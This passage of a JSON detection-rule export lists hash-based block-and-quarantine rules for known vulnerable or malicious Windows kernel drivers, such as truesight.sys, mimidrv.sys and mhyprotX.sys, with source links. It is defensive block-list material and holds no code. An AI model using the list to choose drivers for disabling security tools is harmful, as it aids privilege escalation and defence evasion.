"fb2e8e98a58329e86a1ee310fe9dfce7056f4a0ede380eee8768c51b5870c433", + "comment": "Vulnerable Kernel Driver (aka inpout32.sys) [https://www.loldrivers.io/drivers/97fa88f6-3819-4d56-a82c-52a492a9e2b5/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d3851bce-2f35-5e05-b403-daf2a9dec365", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815579Z", + "creation_date": "2026-03-23T11:45:31.815581Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815586Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "91fab8e79aebe13dc687702d6a7ccbf9293050fafd9b7d443b5000c40d408cec", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d38b5a39-e354-5a16-8366-0051b28079a2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811898Z", + "creation_date": "2026-03-23T11:45:31.811900Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811906Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e41e80a36e3e5f9c6444a626350712e2c12614f2256ada671e0218b24f46120d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d3922563-da8b-58cc-af9d-155962770749", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479202Z", + "creation_date": "2026-03-23T11:45:30.479205Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479211Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85686a6dec96776c2e8510fea7ca198b84429fb0b756a2d87ee1cc4570ac9b87", + "comment": "Vulnerable Kernel Driver (aka NCHGBIOS2x64.SYS) 
[https://www.loldrivers.io/drivers/d2806397-9ceb-47c8-b5f3-3aabec182ff5/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d3969778-ce1d-52d9-91d2-6cd5f3719a96", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829577Z", + "creation_date": "2026-03-23T11:45:30.829581Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829589Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b27c91559b2f4f1736685edee9f9e250dcbd91b479aaae27bbb3ca5b37deb052", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d3a41f63-f28f-53b4-b367-0dc912d403a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472554Z", + "creation_date": 
"2026-03-23T11:45:31.472557Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472566Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "14156ba6bb21cb431a2d70a16df7a54ad7d94febdc4066654b565552098f5f83", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d3aa06f7-b993-5fb1-b89b-b7bb9c9453f8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816574Z", + "creation_date": "2026-03-23T11:45:30.816576Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816582Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bcaeac1a4a51b210bfc5ebdb6f797797299a171e0b6d50aa8f9bcdb45a51d629", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"d3b353f4-4447-5219-999b-5c6e6d4eadbc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488483Z", + "creation_date": "2026-03-23T11:45:31.488485Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488490Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a3fb8d303387f8036e38525aa384030a6e3bc79697f8c5e48188347c7d2704b7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d3d2d931-f613-549d-82aa-1372d91432a4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824058Z", + "creation_date": "2026-03-23T11:45:31.824061Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.824068Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6b0d607abf3d48c6ac77185644fe98a87dc795fe302686464cc700dcb8dfa19b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d3e51087-bb5b-5b87-9d98-6723f79f3224", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461837Z", + "creation_date": "2026-03-23T11:45:30.461841Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461850Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47356707e610cfd0be97595fbe55246b96a69141e1da579e6f662ddda6dc5280", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d3e55608-eccc-5b02-b8ec-eef60cddcf0d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492485Z", + "creation_date": "2026-03-23T11:45:31.492487Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492493Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "600a17409fa52c474a72ab3f5d85817ef052954f81055f558054ecf575808b4a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d3ebe340-1af9-5faa-ae16-85fc43f7668a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481079Z", + "creation_date": "2026-03-23T11:45:30.481081Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481087Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "5c3ac6f22b3f1614ad0c01c180421f7588460accba5065562bf735d24bd3c674", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d4082f0d-8d50-5184-900d-0634dcbbf8a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830499Z", + "creation_date": "2026-03-23T11:45:31.830501Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830506Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1aed62a63b4802e599bbd33162319129501d603cceeb5e1eb22fd4733b3018a3", + "comment": "Vulnerable Rentdrv2 Driver (aka rentdrv2_x32.sys and rentdrv_x64.sys) [https://github.com/keowu/BadRentdrv2, https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d40b5174-6f69-5a46-84cc-5e170c407b67", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820929Z", + "creation_date": "2026-03-23T11:45:30.820931Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820936Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "39134750f909987f6ebb46cf37519bb80707be0ca2017f3735018bac795a3f8d", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d422193a-dbfc-5ece-9450-f79eaa4e60a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819088Z", + "creation_date": "2026-03-23T11:45:30.819090Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819096Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "533b8138ab8f776008ff8918c8cfa52604e43efca4e39da5096404c8424084b7", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) 
[https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d433523c-2392-5f7d-aa32-b6f6565a52c5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976625Z", + "creation_date": "2026-03-23T11:45:29.976627Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976632Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "13cd99ff2120d9fd651814d826b6c8481d549f684a8fbfb2d8775c9faa1c27f5", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) 
[https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d45ef7ea-b157-5a73-a60e-f9f747a74eda", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143165Z", + "creation_date": "2026-03-23T11:45:31.143167Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143173Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f2e0da56010ce28e88a10a08ee98b7015faad016243928b9b8426ef912eb057", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d4685b73-e054-51d9-adff-cf9145dcbc77", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818084Z", + "creation_date": 
"2026-03-23T11:45:30.818086Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818091Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "76940e313c27c7ff692051fbf1fbdec19c8c31a6723a9de7e15c3c1bec8186f6", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d46e1471-4e84-5d89-9691-f9b84b80c2ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620496Z", + "creation_date": "2026-03-23T11:45:29.620498Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620503Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c8dfa14888bb58848b4792fb1d8a921976a9463be8334cff45cc96f1276049a", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d47e7efb-c7ef-55dc-96d5-3dd1da19526d", + "test_maturity_current_count": 
0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476661Z", + "creation_date": "2026-03-23T11:45:31.476665Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476675Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0369c017c4d9d03e1399c31ef0857c94f9b4a759151e1f7dcefb78b76bd86ad5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d489c95f-23c2-55a8-b43b-29575820c453", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978118Z", + "creation_date": "2026-03-23T11:45:29.978120Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978125Z", + "rule_level": 
null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a4ac619fb531793945ad4c72bdd809ebd38512fc234aa452cb8364ee05465a7b", + "comment": "Vulnerable Kernel Driver (aka BlackBoneDrv10.sys) [https://www.loldrivers.io/drivers/722772ee-a461-48ec-933d-f3df1578963e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d48f7729-0e8c-5b4d-85c7-2435444e071e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463156Z", + "creation_date": "2026-03-23T11:45:30.463159Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463167Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c42c1e5c3c04163bf61c3b86b04a5ec7d302af7e254990cef359ac80474299da", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d4934a41-6399-58da-9792-2d15e83ab4ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611847Z", + "creation_date": "2026-03-23T11:45:29.611849Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611854Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "247aadaf17ed894fcacf3fc4e109b005540e3659fd0249190eb33725d3d3082f", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d49b4bc1-1750-5a85-aa8c-b4a14b095e91", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471162Z", + "creation_date": "2026-03-23T11:45:30.471165Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471174Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d15a0bc7a39bbeff10019496c1ed217b7c1b26da37b2bdd46820b35161ddb3c4", + 
"comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/fbdd993b-47b1-4448-8c41-24c310802398/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d4d17544-6fc3-5f62-9746-36cafa10f69a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984355Z", + "creation_date": "2026-03-23T11:45:29.984357Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984363Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "945ee05244316ff2f877718cf0625d4eb34e6ec472f403f958f2a700f9092507", + "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d4e81788-1731-517f-a25d-040acd961ee7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140345Z", + "creation_date": 
